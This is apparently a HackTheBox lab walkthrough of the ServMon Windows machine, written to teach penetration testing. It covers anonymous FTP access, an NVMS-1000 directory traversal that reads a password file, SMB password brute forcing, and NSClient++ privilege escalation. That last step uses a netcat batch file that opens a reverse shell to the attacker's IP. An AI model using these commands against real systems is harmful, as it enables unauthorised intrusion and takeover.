Welcome to yet another of my HackTheBox technical walkthroughs, this time we will be hacking another nice Windows machine, one with a tricky point caused by too many service restarts from other colleagues. Lets dive right in and tackle the ServMon box!

nmap -sV 10.10.10.184

[...]
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  nrpe?
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
[...]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

As always I start off with an nmap scan and the interesting thing from the scan is the open ports and the operating system, which we already know is a Windows machine. Not so many ports, so lets start up our "reconnaissance" activity.

I can see an 80 port open, with a web server running and another one on the port 8443, but in https. Launching the two portals we understand that an NVMS-1000 system is running on the port 80

http://10.10.10.184/

and NSClient++ on the port 8443

https://10.10.10.184:8443/

I started to search on exploit-db and what I found is...

NSClient++ 0.5.2.35 - Privilege Escalation
NSClient++ 0.5.2.35 - Privilege Escalation.. local exploit for Windows platform
TVT NVMS 1000 - Directory Traversal
TVT NVMS 1000 - Directory Traversal. CVE-2019-20085 . webapps exploit for Hardware platform
NVMS 1000 - Directory Traversal
NVMS 1000 - Directory Traversal.. webapps exploit for Hardware platform


I also looked in the metasploit framework and...

msf5 > search nvms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank    Check  Description
   -  ----                                       ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/tvt_nvms_traversal  2019-12-12       normal  No     TVT NVMS-1000 Directory Traversal

Well, its nice to know that somethings there. Lets continue on with the exploration, I try with enum4linux, but nothing comes out. So I come back to the open ports and I notice an ftp service active, so I try to work out if anonymous access is available.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:in7rud3r): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.


Seems that I'm lucky today. From the script, you can see that I found two folders probably linked to the relative users: Nadine and Nathan. Inside there's a text file with some interesting information. I decide to download and read on my pc.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/ftp-intrusion$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

############################

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/ftp-intrusion$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint


In the first one I read about a Password file available on the desktop of one of the users, in the second one, there's a tod o list about completed and uncompleted tasks (I don't know if this could be useful in the future, but the other one for sure is information that we have to remember).

Among the open doors, we still have to check the ssh service.

OpenSSH 2.3 < 7.7 - Username Enumeration
OpenSSH 2.3 < 7.7 - Username Enumeration. CVE-2018-15473 . remote exploit for Linux platform
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC). CVE-2018-15473 . remote exploit for Linux platform


...and on metasploit...

msf5 > search ssh_enum

Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_enum_git_keys                   normal  No     Test SSH Github Access
   1  auxiliary/scanner/ssh/ssh_enumusers                       normal  No     SSH Username Enumeration


msf5 > search ssh_log

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Ok, it's time to move on to the attack. As my usual, I'd like to list all my trials and give you also my mistakes, until I arrive at the correct solution.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/48311 - NVMS 1000$ python3 48311.py http://10.10.10.184/ windows/win.ini win.ini
Host not vulnerable to Directory Traversal!


The NVMS portal, seems to be not vulnerable.

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > options

Module options (auxiliary/scanner/http/tvt_nvms_traversal):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   DEPTH      13                yes       Depth for Path Traversal
   FILEPATH   /windows/win.ini  yes       The path to the file to read
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                 yes       The base URI path of nvms
   THREADS    1                 yes       The number of concurrent threads (max one per host)
   VHOST                        no        HTTP server virtual host

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > exploit

[-] Nothing was downloaded
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Confirmed by metasploit. I decide to try with ssh service.

msf5 auxiliary(scanner/ssh/ssh_enumusers) > options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads (max one per host)
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                      no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet


msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username Nathan
username => Nathan
msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.184:22 - SSH - Using malformed packet technique
[*] 10.10.10.184:22 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username Nadine
username => Nadine
msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.184:22 - SSH - Using malformed packet technique
[*] 10.10.10.184:22 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Failed again on the ssh service, so I go back to my thoughts and I think that I chose the wrong file, following the exploit too much.  I have to merge what I know with what I have, so I try again with the "traversal directory" and the file that I should be sure that exist and that I probably know the path on the disk.

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > options

Module options (auxiliary/scanner/http/tvt_nvms_traversal):

   Name       Current Setting                                    Required  Description
   ----       ---------------                                    --------  -----------
   DEPTH      13                                                 yes       Depth for Path Traversal
   FILEPATH   ../../../../../Users/Nathan/Desktop/Passwords.txt  yes       The path to the file to read
   Proxies                                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.184                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                                 yes       The target port (TCP)
   SSL        false                                              no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                                  yes       The base URI path of nvms
   THREADS    1                                                  yes       The number of concurrent threads (max one per host)
   VHOST                                                         no        HTTP server virtual host

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set targeturi /Pages/
targeturi => /Pages/
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > exploit

[+] 10.10.10.184:80 - Downloaded 156 bytes
[+] File saved in: /root/.msf4/loot/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Ahhh, fine, the gears begin to rotate in the right direction.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ cat 20200417175842_default_10.10.10.184_nvms.traversal_284939.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$


Fantastic, now, we have to understand where to use this password. Being windows, I start with the most obvious thing, the SAMBA protocol.

msf5 auxiliary(scanner/smb/smb_login) > options 

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set pass_file attack/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
pass_file => attack/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/smb/smb_login) > set smbuser Nathan
smbuser => Nathan
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.184:445      - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:Gr4etN3w5w17hMySk1Pa5$',
[*] 10.10.10.184:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Mmmmm, this is really strange, I try to use the password list also for the user Nadine, convinced that isn't a logical idea, but it's better to try, but with a big surprise...

msf5 auxiliary(scanner/smb/smb_login) > set smbuser Nadine
smbuser => Nadine
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.184:445      - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445      - 10.10.10.184:445 - Success: '.\Nadine:L1k3B1gBut7s@W0rk'
[*] 10.10.10.184:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Interesting, probably I misinterpreted the messages, but it doesn't matter, let's move on. I know that I can use this password for the SMB, so I would like to know which shared folders are available on the machine.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient -L 10.10.10.184 -U Nadine
Enter WORKGROUP\Nadine's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient //10.10.10.184/C$ -U Nadine
Enter WORKGROUP\Nadine's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient //10.10.10.184/ADMIN$ -U Nadine
Enter WORKGROUP\Nadine's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED


Ouch, something is coming out, but immediately after another closed door. What's next? Another available service is the ssh, so why not try? And...

ssh -l Nadine 10.10.10.184

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine

17/04/2020  17:33    <DIR>          .
17/04/2020  17:33    <DIR>          ..
17/04/2020  17:33    <DIR>          .ssh
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              16 Dir(s)  27,343,183,872 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
17/04/2020  17:30                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,343,159,296 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt
6******************************0

Bingo, the first flag is mine.

Now, if you remember (and if you have given a look at the exploit-db pages I linked at the beginning of this tutorial) the exploit for the NSClient++ portal, needs a credential without administration privileges (our scenario), so, you have only to follow the step by step procedure described in the exploit. Let's go to do that.

1. Grab web administrator password

[...]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
[...]


Both the methods work, but with the first method I found information that helps me to proceed with the attack: the access to the portal is available only from the local machine (127.0.0.1).

Now, I can't access from the remote pc to the portal, so I have to find a way to replicate the portal on my localhost using the process on the remote pc. I don't know exactly how can I accomplish this task, but a search on the internet (ssh local port forwarding) will be enough to find a solution.

I read an Italian article which I provide here, because with a simple translation you can read too, but I found a clear explanation in this article and, for once, I enjoyed reading in my native language. The solution is simple and use the already used ssh service.

ssh Nadine@10.10.10.184  -L  8443:127.0.0.1:8443

This will open a shell on the remote machine (that you could use also to execute the remote commands) and will provide the output of the port 8433 of the web on your local equivalent port.

Before we go on with the exploit, we need to go deep into the exploit. Consider that now, you are entering in that part of the attack where you could lose a lot of time, because you have to restart part of the service, but, the problem is, that, as you are trying to hack the machine, also many other "colleagues" are made the same thing, so, you probably will be thrown out, many times and you'll have to sweat a lot to reach your goal. Anyway, you need nc.exe  (netcat for Windows) and a batch file that launch this exe. I chose to put all my file in a custom folder inside the Temp directory, so my batch file will be this:

@echo off
c:\temp\46802\nc.exe 10.10.15.11 443 -e cmd.exe

To upload the file, also in this case, I don't know exactly how can I do that, but google is always our friend.

How to upload local file to server through Linux terminal
I am trying to upload local files to server by using Putty or SSH but not getting upload there. Is there any direct method to upload file from local to server from Linux terminal without using FTP...
3. Download nc.exe and evil.bat to c:\temp from attacking machine

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ scp nc.exe Nadine@10.10.10.184:\\Temp\\46802\\nc.exe
Nadine@10.10.10.184's password: 
nc.exe                                                                                            100%   20KB  30.7KB/s   00:00    
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ scp evil.bat Nadine@10.10.10.184:\\Temp\\46802\\evil.bat
Nadine@10.10.10.184's password: 
evil.bat                                                                                          100%   61     1.0KB/s   00:00    


Ok, let's go ahead with the exploit, but we have skipped the second point (you should access the portal using the address https://127.0.0.1:8443/):

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

No problem anyway, the two services are already enabled.

4. Setup listener on attacking machine

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ sudo nc -nlvvp 443
[sudo] password for in7rud3r: 
listening on [any] 443 ...


Well, from now, the situation is critical and you have to try this last three steps many and many times until it works. Pay attention, because, if the machine is restarted in the meantime, you should redeploy the files you had prepared on your machine. A suggestion is to use different name suggested in the exploit, because, all will follow probably the same tutorial and will use all the same variables and name, someone could be overwriting your settings.

If you perform all the steps in the correct way, sooner or later you should see your listeners activate with the shell from the remote machine and from here, you'll reach the second flag!

connect to [10.10.15.11] from (UNKNOWN) [10.10.10.184] 50811
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>cd \Users\administrator
cd \Users\administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
17/04/2020  21:35                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,410,821,120 bytes free

C:\Users\Administrator\Desktop>more root.txt    
more root.txt
5******************************e


That's all folks, thanks for reading!

The image used in this article is called Summon Your Eagle Powers and was created by Nicholas Roberts.